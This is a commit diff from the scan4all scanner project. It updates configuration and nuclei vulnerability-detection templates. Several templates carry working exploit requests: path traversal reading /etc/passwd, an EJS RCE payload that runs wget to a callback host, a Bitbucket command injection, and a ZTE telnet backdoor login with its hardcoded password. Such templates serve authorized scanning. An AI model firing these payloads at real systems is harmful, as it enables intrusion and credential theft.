crash.software
Projects
Pull Requests
Issues
Builds
scan4all
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY scan4all Commits 52ace35b
🤬
  • ■ ■ ■ ■
    config/config.json
    skipped 98 lines
    99 99   "CheckWeakPassword": true,
    100 100   "esthread": 8,
    101 101   "hydrathread": 64,
    102  - "Fuzzthreads": 32,
     102 + "Fuzzthreads": 16,
    103 103   "enableFingerTitleHeaderMd5Hex": false,
    104 104   "Cookie": "",
    105 105   "esUrl": "http://127.0.0.1:9200/%s_index/_doc/%s",
    skipped 6 lines
  • ■ ■ ■ ■
    config/config_me.json
    skipped 81 lines
    82 82   "FollowRedirects": false,
    83 83   "MaxRedirects": 3
    84 84   },
    85  - "enableEsSv": false,
     85 + "enableEsSv": true,
    86 86   "CheckWeakPassword": true,
    87 87   "esthread": 8,
    88 88   "hydrathread": 64,
    skipped 10 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/README.md
    skipped 41 lines
    42 42   
    43 43  | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
    44 44  |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
    45  -| cve | 1430 | daffainfo | 631 | cves | 1407 | info | 1474 | http | 3858 |
    46  -| panel | 655 | dhiyaneshdk | 584 | exposed-panels | 662 | high | 1009 | file | 76 |
    47  -| edb | 563 | pikpikcu | 329 | vulnerabilities | 509 | medium | 818 | network | 51 |
    48  -| lfi | 509 | pdteam | 269 | technologies | 282 | critical | 478 | dns | 17 |
    49  -| xss | 491 | geeknik | 187 | exposures | 275 | low | 225 | | |
    50  -| wordpress | 419 | dwisiswant0 | 169 | misconfiguration | 237 | unknown | 11 | | |
    51  -| exposure | 407 | 0x_akoko | 165 | token-spray | 230 | | | | |
    52  -| cve2021 | 352 | princechaddha | 151 | workflows | 189 | | | | |
    53  -| rce | 337 | ritikchaddha | 137 | default-logins | 103 | | | | |
    54  -| wp-plugin | 316 | pussycat0x | 133 | file | 76 | | | | |
     45 +| cve | 1444 | daffainfo | 631 | cves | 1421 | info | 1482 | http | 3894 |
     46 +| panel | 663 | dhiyaneshdk | 594 | exposed-panels | 670 | high | 1031 | file | 76 |
     47 +| edb | 565 | pikpikcu | 329 | vulnerabilities | 513 | medium | 818 | network | 52 |
     48 +| lfi | 513 | pdteam | 269 | technologies | 283 | critical | 483 | dns | 17 |
     49 +| xss | 496 | geeknik | 192 | exposures | 280 | low | 228 | | |
     50 +| wordpress | 422 | dwisiswant0 | 169 | misconfiguration | 240 | unknown | 11 | | |
     51 +| exposure | 415 | 0x_akoko | 166 | token-spray | 230 | | | | |
     52 +| cve2021 | 353 | princechaddha | 151 | workflows | 190 | | | | |
     53 +| rce | 338 | ritikchaddha | 137 | default-logins | 103 | | | | |
     54 +| wp-plugin | 319 | pussycat0x | 133 | file | 76 | | | | |
    55 55   
    56  -**296 directories, 4231 files**.
     56 +**297 directories, 4270 files**.
    57 57   
    58 58  </td>
    59 59  </tr>
    skipped 38 lines
  • config/nuclei-templates/TEMPLATES-STATS.json
    Unable to diff as some line is too long.
  • config/nuclei-templates/TEMPLATES-STATS.md
    Diff is too large to be displayed.
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/TOP-10.md
    1 1  | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
    2 2  |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
    3  -| cve | 1430 | daffainfo | 631 | cves | 1407 | info | 1474 | http | 3858 |
    4  -| panel | 655 | dhiyaneshdk | 584 | exposed-panels | 662 | high | 1009 | file | 76 |
    5  -| edb | 563 | pikpikcu | 329 | vulnerabilities | 509 | medium | 818 | network | 51 |
    6  -| lfi | 509 | pdteam | 269 | technologies | 282 | critical | 478 | dns | 17 |
    7  -| xss | 491 | geeknik | 187 | exposures | 275 | low | 225 | | |
    8  -| wordpress | 419 | dwisiswant0 | 169 | misconfiguration | 237 | unknown | 11 | | |
    9  -| exposure | 407 | 0x_akoko | 165 | token-spray | 230 | | | | |
    10  -| cve2021 | 352 | princechaddha | 151 | workflows | 189 | | | | |
    11  -| rce | 337 | ritikchaddha | 137 | default-logins | 103 | | | | |
    12  -| wp-plugin | 316 | pussycat0x | 133 | file | 76 | | | | |
     3 +| cve | 1444 | daffainfo | 631 | cves | 1421 | info | 1482 | http | 3894 |
     4 +| panel | 663 | dhiyaneshdk | 594 | exposed-panels | 670 | high | 1031 | file | 76 |
     5 +| edb | 565 | pikpikcu | 329 | vulnerabilities | 513 | medium | 818 | network | 52 |
     6 +| lfi | 513 | pdteam | 269 | technologies | 283 | critical | 483 | dns | 17 |
     7 +| xss | 496 | geeknik | 192 | exposures | 280 | low | 228 | | |
     8 +| wordpress | 422 | dwisiswant0 | 169 | misconfiguration | 240 | unknown | 11 | | |
     9 +| exposure | 415 | 0x_akoko | 166 | token-spray | 230 | | | | |
     10 +| cve2021 | 353 | princechaddha | 151 | workflows | 190 | | | | |
     11 +| rce | 338 | ritikchaddha | 137 | default-logins | 103 | | | | |
     12 +| wp-plugin | 319 | pussycat0x | 133 | file | 76 | | | | |
    13 13   
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2015/CVE-2015-3035.yaml
     1 +id: CVE-2015-3035
     2 + 
     3 +info:
     4 + name: Multiple TP-LINK Products Vulnerable - Local File Inclusion
     5 + author: 0x_Akoko
     6 + severity: high
     7 + description: |
     8 + Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed.
     9 + reference:
     10 + - https://seclists.org/fulldisclosure/2015/Apr/26
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2015-3035
     12 + - https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150410-0_TP-Link_Unauthenticated_local_file_disclosure_vulnerability_v10.txt
     13 + - http://www.tp-link.com/en/download/TL-WDR3600_V1.html#Firmware
     14 + classification:
     15 + cve-id: CVE-2015-3035
     16 + metadata:
     17 + shodan-query: http.title:"TP-LINK"
     18 + verified: "true"
     19 + tags: router,lfi,seclists,cve,cve2015,tplink,kev
     20 + 
     21 +requests:
     22 + - method: GET
     23 + path:
     24 + - "{{BaseURL}}/login/../../../etc/passwd"
     25 + 
     26 + matchers-condition: and
     27 + matchers:
     28 + - type: regex
     29 + regex:
     30 + - "root:[x*]:0:0"
     31 + 
     32 + - type: status
     33 + status:
     34 + - 200
     35 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24214.yaml
    1 1  id: CVE-2021-24214
    2 2  info:
    3  - name: OpenID Connect Generic Client 3.8.0-3.8.1 - Reflected Cross Site Scripting (XSS) via Login Error
     3 + name: WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting
    4 4   author: tess
    5 5   severity: medium
    6  - description: The OpenID Connect Generic Client WordPress plugin 3.8.0 and 3.8.1 did not sanitise the login error when output back in the login form, leading to a reflected Cross-Site Scripting issue. This issue does not require authentication and can be exploited with the default configuration.
     6 + description: WordPress OpenID Connect Generic Client plugin 3.8.0 and 3.8.1 contains a cross-site scripting vulnerability. It does not sanitize the login error when output back in the login form, thereby not requiring authentication, which can be exploited with the default configuration.
    7 7   reference:
    8 8   - https://wpscan.com/vulnerability/31cf0dfb-4025-4898-a5f4-fc7115565a10
     9 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24214
    9 10   - https://nvd.nist.gov/vuln/detail/CVE-2021-24214
    10  - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24214
    11 11   classification:
    12 12   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    13 13   cvss-score: 6.1
    skipped 26 lines
    40 40   status:
    41 41   - 200
    42 42   
     43 +# Enhanced by md on 2022/09/19
     44 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-42013.yaml
    skipped 41 lines
    42 42   Origin: {{BaseURL}}
    43 43   Content-Type: application/x-www-form-urlencoded
    44 44   
    45  - echo Echo: CVE-2021-42013; echo; {{cmd}};
     45 + echo Content-Type: text/plain; echo; {{cmd}}
    46 46   
    47 47   stop-at-first-match: true
    48 48   unsafe: true
    49 49   matchers-condition: or
    50 50   matchers:
    51  - 
    52 51   - type: regex
    53 52   name: LFI
    54 53   regex:
    skipped 9 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-0678.yaml
    1 1  id: CVE-2022-0678
    2 2   
    3 3  info:
    4  - name: Microweber < 1.2.11- Cross-Site Scripting
     4 + name: Packagist <1.2.11 - Cross-Site Scripting
    5 5   author: tess
    6 6   severity: medium
    7 7   description: |
    8  - Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.
     8 + Packagist prior to 1.2.11 contains a cross-site scripting vulnerability via microweber/microweber. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.
    9 9   reference:
    10 10   - https://huntr.dev/bounties/d707137a-aace-44c5-b15c-1807035716c0/
    11 11   - https://twitter.com/CVEnew/status/1495001503249178624?s=20&t=sfABvm7oG39Fd6rG44vQWg
    12  - - https://nvd.nist.gov/vuln/detail/CVE-2022-0678
    13 12   - https://huntr.dev/bounties/d707137a-aace-44c5-b15c-1807035716c0
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0678
    14 14   classification:
    15 15   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    16 16   cvss-score: 6.1
    skipped 27 lines
    44 44   status:
    45 45   - 404
    46 46   
     47 +# Enhanced by md on 2022/09/19
     48 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-2544.yaml
     1 +id: CVE-2022-2544
     2 +info:
     3 + name: Ninja Job Board < 1.3.3 - Resume Disclosure via Directory Listing
     4 + author: tess
     5 + severity: high
     6 + description: The plugin does not protect the directory where it stores uploaded resumes, making it vulnerable to unauthenticated Directory Listing which allows the download of uploaded resumes.
     7 + reference:
     8 + - https://plugins.trac.wordpress.org/changeset/2758420/ninja-job-board/trunk/includes/Classes/File/FileHandler.php?old=2126467&old_path=ninja-job-board%2Ftrunk%2Fincludes%2FClasses%2FFile%2FFileHandler.php
     9 + - https://wpscan.com/vulnerability/a9bcc68c-eeda-4647-8463-e7e136733053
     10 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2544
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-2544
     12 + classification:
     13 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     14 + cvss-score: 7.5
     15 + cve-id: CVE-2022-2544
     16 + cwe-id: CWE-425
     17 + metadata:
     18 + verified: true
     19 + tags: ninja,exposure,wpscan,cve,cve2022,wordpress,wp-plugin,wp
     20 + 
     21 +requests:
     22 + - method: GET
     23 + path:
     24 + - "{{BaseURL}}/wp/wp-content/uploads/wpjobboard/"
     25 + - "{{BaseURL}}/wp-content/uploads/wpjobboard/"
     26 + 
     27 + stop-at-first-match: true
     28 + matchers-condition: and
     29 + matchers:
     30 + - type: word
     31 + part: body
     32 + words:
     33 + - "Index of /wp/wp-content/uploads/wpjobboard"
     34 + - "Index of /wp-content/uploads/wpjobboard"
     35 + 
     36 + - type: word
     37 + part: header
     38 + words:
     39 + - "text/html"
     40 + 
     41 + - type: status
     42 + status:
     43 + - 200
     44 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-29078.yaml
     1 +id: CVE-2022-29078
     2 + 
     3 +info:
     4 + name: Ejs - RCE
     5 + author: For3stCo1d
     6 + severity: critical
     7 + description: |
     8 + The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).
     9 + reference:
     10 + - https://eslam.io/posts/ejs-server-side-template-injection-rce/
     11 + - https://github.com/miko550/CVE-2022-29078
     12 + - https://github.com/mde/ejs/commit/15ee698583c98dadc456639d6245580d17a24baf
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2022-29078
     14 + classification:
     15 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     16 + cvss-score: 9.8
     17 + cve-id: CVE-2022-29078
     18 + cwe-id: CWE-74
     19 + tags: cve,cve2022,rce,ejs,nodejs,oast
     20 + 
     21 +requests:
     22 + - raw:
     23 + - |
     24 + GET /page?id={{randstr}}&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27);s HTTP/1.1
     25 + Host: {{Hostname}}
     26 + 
     27 + matchers-condition: and
     28 + matchers:
     29 + - type: word
     30 + part: interactsh_protocol # Confirms the HTTP Interaction
     31 + words:
     32 + - "http"
     33 + 
     34 + - type: word
     35 + part: body
     36 + words:
     37 + - "You are viewing page number"
     38 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-34121.yaml
     1 +id: CVE-2022-34121
     2 + 
     3 +info:
     4 + name: CuppaCMS v1.0 - Local File Inclusion
     5 + author: edoardottt
     6 + severity: high
     7 + description: |
     8 + Cuppa CMS v1.0 was discovered to contain a local file inclusion (LFI) vulnerability via the component /templates/default/html/windows/right.php.
     9 + reference:
     10 + - https://github.com/hansmach1ne/MyExploits/tree/main/LFI_in_CuppaCMS_templates
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-34121
     12 + - https://github.com/CuppaCMS/CuppaCMS/issues/18
     13 + classification:
     14 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     15 + cvss-score: 7.5
     16 + cve-id: CVE-2022-34121
     17 + cwe-id: CWE-829
     18 + metadata:
     19 + verified: "true"
     20 + tags: cve,cve2022,lfi,cuppa,cms
     21 + 
     22 +requests:
     23 + - raw:
     24 + - |
     25 + POST /templates/default/html/windows/right.php HTTP/1.1
     26 + Host: {{Hostname}}
     27 + Content-Type: application/x-www-form-urlencoded
     28 + 
     29 + url=../../../../../../../../../../../../etc/passwd
     30 + 
     31 + matchers-condition: and
     32 + matchers:
     33 + - type: regex
     34 + regex:
     35 + - "root:[x*]:0:0"
     36 + 
     37 + - type: status
     38 + status:
     39 + - 200
     40 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-36804.yaml
     1 +id: CVE-2022-36804
     2 + 
     3 +info:
     4 + name: Atlassian Bitbucket Command Injection Vulnerability
     5 + author: DhiyaneshDk,tess,sullo
     6 + severity: high
     7 + description: |
     8 + Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request.
     9 + reference:
     10 + - https://github.com/notdls/CVE-2022-36804
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-36804
     12 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
     13 + - https://jira.atlassian.com/browse/BSERV-13438
     14 + classification:
     15 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     16 + cvss-score: 8.8
     17 + cve-id: CVE-2022-36804
     18 + cwe-id: CWE-77
     19 + metadata:
     20 + shodan-query: http.component:"BitBucket"
     21 + tags: cve,cve2022,bitbucket,atlassian
     22 + 
     23 +variables:
     24 + data: '{{rand_base(5)}}'
     25 + 
     26 +requests:
     27 + - raw:
     28 + - |
     29 + GET /rest/api/latest/repos HTTP/1.1
     30 + Host: {{Hostname}}
     31 + 
     32 + - |
     33 + GET /rest/api/latest/projects/{{key}}/repos/{{slug}}/archive?filename={{data}}&at={{data}}&path={{data}}&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1
     34 + Host: {{Hostname}}
     35 + 
     36 + iterate-all: true
     37 + extractors:
     38 + - type: json # type of the extractor
     39 + part: body
     40 + name: key
     41 + json:
     42 + - '.["values"] | .[] | .["project"] | .key'
     43 + internal: true
     44 + 
     45 + - type: json # type of the extractor
     46 + part: body
     47 + name: slug
     48 + json:
     49 + - '.["values"] | .[] | .slug'
     50 + internal: true
     51 + 
     52 + - type: regex
     53 + group: 1
     54 + regex:
     55 + - 'uid=.*\(([a-z]+)\):'
     56 + 
     57 + stop-at-first-match: true
     58 + matchers-condition: and
     59 + matchers:
     60 + - type: word
     61 + words:
     62 + - "com.atlassian.bitbucket.scm.CommandFailedException"
     63 + 
     64 + - type: status
     65 + status:
     66 + - 500
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-39960.yaml
     1 +id: CVE-2022-39960
     2 + 
     3 +info:
     4 + name: Atlassian Jira addon Netic Group Export < 1.0.3 - Unauthenticated Access
     5 + author: For3stCo1d
     6 + severity: medium
     7 + description: |
     8 + The Netic Group Export add-on before 1.0.3 for Atlassian Jira does not perform authorization checks. This might allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI.
     9 + reference:
     10 + - https://gist.github.com/CveCt0r/ca8c6e46f536e9ae69fc6061f132463e
     11 + - https://marketplace.atlassian.com/apps/1222388/group-export-for-jira/version-history
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2022-39960
     13 + classification:
     14 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     15 + cvss-score: 5.3
     16 + cve-id: CVE-2022-39960
     17 + cwe-id: CWE-862
     18 + metadata:
     19 + shodan-query: http.component:"Atlassian Jira"
     20 + verified: "true"
     21 + tags: cve,cve2022,atlassian,jira,netic,unauth
     22 + 
     23 +requests:
     24 + - raw:
     25 + - |
     26 + POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1
     27 + Host: {{Hostname}}
     28 + Content-Type: application/x-www-form-urlencoded
     29 + 
     30 + groupexport_searchstring=&groupexport_download=true
     31 + 
     32 + matchers-condition: and
     33 + matchers:
     34 + - type: word
     35 + part: body
     36 + words:
     37 + - '"jiraGroupObjects"'
     38 + - '"groupName"'
     39 + condition: and
     40 + 
     41 + - type: word
     42 + part: header
     43 + words:
     44 + - "attachment"
     45 + - "jira-group-export"
     46 + condition: and
     47 + 
     48 + - type: status
     49 + status:
     50 + - 200
     51 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/miscellaneous/addeventlistener-detect.yaml
    1 1  id: addeventlistener-detect
    2 2   
    3 3  info:
    4  - name: DOM EventListener detection
     4 + name: DOM EventListener - Cross-Site Scripting
    5 5   author: yavolo,dwisiswant0
    6 6   severity: info
     7 + description: EventListener contains a cross-site scripting vulnerability via the document object model (DOM). An attacker can execute arbitrary script which can then allow theft of cookie-based authentication credentials and launch of other attacks.
    7 8   reference:
    8 9   - https://portswigger.net/web-security/dom-based/controlling-the-web-message-source
     10 + classification:
     11 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     12 + cvss-score: 7.2
     13 + cwe-id: CWE-79
    9 14   tags: xss,misc
    10 15   
    11 16  requests:
    skipped 7 lines
    19 24   regex:
    20 25   - (([\w\_]+)\.)?add[Ee]vent[Ll]istener\(["']?[\w\_]+["']? # Test cases: https://www.regextester.com/?fam=121118
    21 26   
     27 +# Enhanced by md on 2022/09/19
     28 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/misconfiguration/bitbucket-public-repository.yaml
     1 +id: bitbucket-public-repository
     2 + 
     3 +info:
     4 + name: Atlassian Bitbucket Public Repository Exposure
     5 + author: DhiyaneshDk
     6 + severity: low
     7 + metadata:
     8 + verified: true
     9 + shodan-query: http.component:"Bitbucket"
     10 + tags: misconfig,bitbucket
     11 + 
     12 +requests:
     13 + - method: GET
     14 + path:
     15 + - "{{BaseURL}}/repos?visibility=public"
     16 + - "{{BaseURL}}/bitbucket/repos?visibility=public"
     17 + 
     18 + stop-at-first-match: true
     19 + matchers-condition: and
     20 + matchers:
     21 + - type: word
     22 + part: body
     23 + words:
     24 + - 'Public Repositories - Bitbucket'
     25 + 
     26 + - type: word
     27 + part: header
     28 + words:
     29 + - "text/html"
     30 + 
     31 + - type: status
     32 + status:
     33 + - 200
     34 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/misconfiguration/xss-deprecated-header.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: XSS-Protection Header - Cross-Site Scripting
    5 5   author: joshlarsen
    6  - severity: high
    7  - description: XSS-Protection header in Explorer, Chrome, and Safari contains a cross-site scripting vulnerability if set to any value other than `0`.
     6 + severity: info
     7 + description: Setting the XSS-Protection header is deprecated. Setting the header to anything other than `0` can actually introduce an XSS vulnerability.
    8 8   reference:
    9 9   - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-XSS-Protection
    10 10   - https://owasp.org/www-project-secure-headers/#x-xss-protection
    11 11   classification:
    12  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    13  - cvss-score: 7.2
    14  - cwe-id: CWE-79
     12 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
     13 + cvss-score: 0.0
    15 14   tags: xss,misconfig,generic
    16 15   
    17 16  requests:
    skipped 26 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/network/backdoor/backdoored-zte.yaml
     1 +id: backdoored-zte
     2 + 
     3 +info:
     4 + name: Backdoored ZTE Routers
     5 + author: its0x08
     6 + severity: high
     7 + description: |
     8 + Multiple ZTE routers have a telnet hardcoded backdoor account that spawns root shell.
     9 + reference:
     10 + - https://www.exploit-db.com/ghdb/7179
     11 + metadata:
     12 + verified: true
     13 + shodan-query: http.html:"ZTE Corporation"
     14 + tags: edb,network,zte,telnet,backdoor,router
     15 + 
     16 +network:
     17 + - host:
     18 + - "{{Hostname}}"
     19 + - "{{Host}}:23"
     20 + 
     21 + inputs:
     22 + - data: "root\r\n"
     23 + - data: "Zte521\r\n\r\n"
     24 + read: 1024
     25 + 
     26 + matchers:
     27 + - type: word
     28 + words:
     29 + - "BusyBox"
     30 + 
     31 + extractors:
     32 + - type: regex
     33 + regex:
     34 + - '[A-Z]{1,}[0-9]{3,4}'
     35 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/ssl/detect-ssl-issuer.yaml
     1 +id: detect-ssl-issuer
     2 + 
     3 +info:
     4 + name: Detect SSL Certificate Issuer
     5 + author: Lingtren
     6 + severity: info
     7 + tags: ssl
     8 + 
     9 +ssl:
     10 + - address: "{{Host}}:{{Port}}"
     11 + 
     12 + extractors:
     13 + - type: json
     14 + json:
     15 + - " .issuer_organization[]"
     16 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/drupal/drupal-avatar-xss.yaml
    1 1  id: drupal-avatar-xss
    2 2   
    3 3  info:
    4  - name: Drupal avatar_uploader v7.x-1.0-beta8 - Cross-Site Scripting
     4 + name: Drupal Avatar Uploader - Cross-Site Scripting
    5 5   author: bywalks
    6  - severity: medium
     6 + severity: high
    7 7   description: |
    8  - This plugin creates a avatar_uploader from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
     8 + Drupal Avatar Uploader v7.x-1.0-beta8 plugin contains a cross-site scripting vulnerability in the slider import search feature and tab parameter via plugin settings.
    9 9   reference:
    10 10   - https://www.exploit-db.com/exploits/50841
    11  - tags: xss,drupal,edb
     11 + - https://packetstormsecurity.com/files/166409/Drupal-Avatar-Upload-7.x-1.0-beta8-Cross-Site-Scripting.html
     12 + classification:
     13 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     14 + cvss-score: 7.2
     15 + cwe-id: CWE-79
     16 + tags: xss,drupal,edb,packetstorm
    12 17   
    13 18  requests:
    14 19   - method: GET
    skipped 17 lines
    32 37   status:
    33 38   - 200
    34 39   
     40 +# Enhanced by md on 2022/09/19
     41 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/generic/cors-misconfig.yaml
    skipped 12 lines
    13 13  requests:
    14 14   - raw:
    15 15   - |
    16  - GET / HTTP/1.1
    17  - Host: {{Hostname}}
    18  - Origin: {{cors_origin}}
    19  - - |
    20  - GET {{path}} HTTP/1.1
     16 + GET HTTP/1.1
    21 17   Host: {{Hostname}}
    22 18   Origin: {{cors_origin}}
    23 19   
    skipped 10 lines
    34 30   - "http://{{tolower(rand_base(5))}}.{{RDN}}" # Arbitrary subdomain over http
    35 31   
    36 32   stop-at-first-match: true
    37  - matchers-condition: or
    38 33   matchers:
    39 34   - type: dsl
    40 35   name: arbitrary-origin
    skipped 5 lines
  • ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml
    1 1  id: gnuboard-sms-xss
    2 2   
    3 3  info:
    4  - name: Gnuboard CMS - SMS Emoticon Cross-Site Scripting
     4 + name: Gnuboard CMS - Cross-Site Scripting
    5 5   author: gy741
    6 6   severity: medium
    7  - description: A vulnerability in Gnuboard CMS allows remote attackers to inject arbitrary Javascript into the responses returned by the server.
     7 + description: Gnuboard CMS contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary JavaScript into the responses returned by the server.
    8 8   reference:
    9 9   - https://sir.kr/g5_pds/4788?page=5
    10 10   - https://github.com/gnuboard/gnuboard5/commit/8182cac90d2ee2f9da06469ecba759170e782ee3
     11 + classification:
     12 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     13 + cvss-score: 7.2
     14 + cwe-id: CWE-79
    11 15   metadata:
    12 16   verified: true
    13 17   shodan-query: http.html:"Gnuboard"
    skipped 20 lines
    34 38   status:
    35 39   - 200
    36 40   
     41 +# Enhanced by md on 2022/09/19
     42 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/gnuboard/gnuboard5-rxss.yaml
    1 1  id: gnuboard5-rxss
    2 2   
    3 3  info:
    4  - name: Gnuboard5 - Cross-Site Scripting
     4 + name: Gnuboard 5 - Cross-Site Scripting
    5 5   author: arafatansari
    6 6   severity: medium
    7 7   description: |
    8  - Gnuboard 5 is vulnerable to reflected XSS via $_GET['LGD_OID'].
     8 + Gnuboard 5 contains a cross-site scripting vulnerability via the $_GET['LGD_OID'] parameter.
    9 9   reference:
    10 10   - https://huntr.dev/bounties/ed317cde-9bd1-429e-b6d3-547e72534dd5/
     11 + - https://vulners.com/huntr/25775287-88CD-4F00-B978-692D627DFF04
     12 + classification:
     13 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     14 + cvss-score: 7.2
     15 + cwe-id: CWE-79
    11 16   metadata:
    12 17   verified: true
    13 18   shodan-query: http.html:"gnuboard5"
    skipped 19 lines
    33 38   status:
    34 39   - 200
    35 40   
     41 +# Enhanced by md on 2022/09/19
     42 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/gnuboard/gnuboard5-xss.yaml
    1 1  id: gnuboard5-xss
    2 2   
    3 3  info:
    4  - name: Gnuboard5 - Cross-Site Scripting
     4 + name: Gnuboard 5 - Cross-Site Scripting
    5 5   author: arafatansari
    6 6   severity: medium
    7 7   description: |
    8  - Gnuboard 5 is vulnerable to reflected XSS to a flaw in the clean_xss_tags() function called in new.php.
     8 + Gnuboard 5 contains a cross-site scripting vulnerability via the clean_xss_tags() function called in new.php.
    9 9   reference:
    10 10   - https://huntr.dev/bounties/ad2a9b32-fe6c-43e9-9b05-2c77c58dde6a/
     11 + classification:
     12 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     13 + cvss-score: 7.2
     14 + cwe-id: CWE-79
    11 15   metadata:
    12 16   verified: true
    13 17   shodan-query: http.html:"gnuboard5"
    skipped 19 lines
    33 37   status:
    34 38   - 200
    35 39   
     40 +# Enhanced by md on 2022/09/19
     41 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/httpbin/httpbin-xss.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: HTTPBin - Cross-Site Scripting
    5 5   author: Adam Crosser
    6  - severity: medium
     6 + severity: high
     7 + description: HTTPBin contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
    7 8   reference:
    8 9   - https://github.com/postmanlabs/httpbin
     10 + classification:
     11 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     12 + cvss-score: 7.2
     13 + cwe-id: CWE-79
    9 14   metadata:
    10 15   shodan-query:
    11 16   - html:"https://github.com/requests/httpbin"
    skipped 21 lines
    33 38   status:
    34 39   - 200
    35 40   
     41 +# Enhanced by md on 2022/09/19
     42 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/ibm/eclipse-help-system-xss.yaml
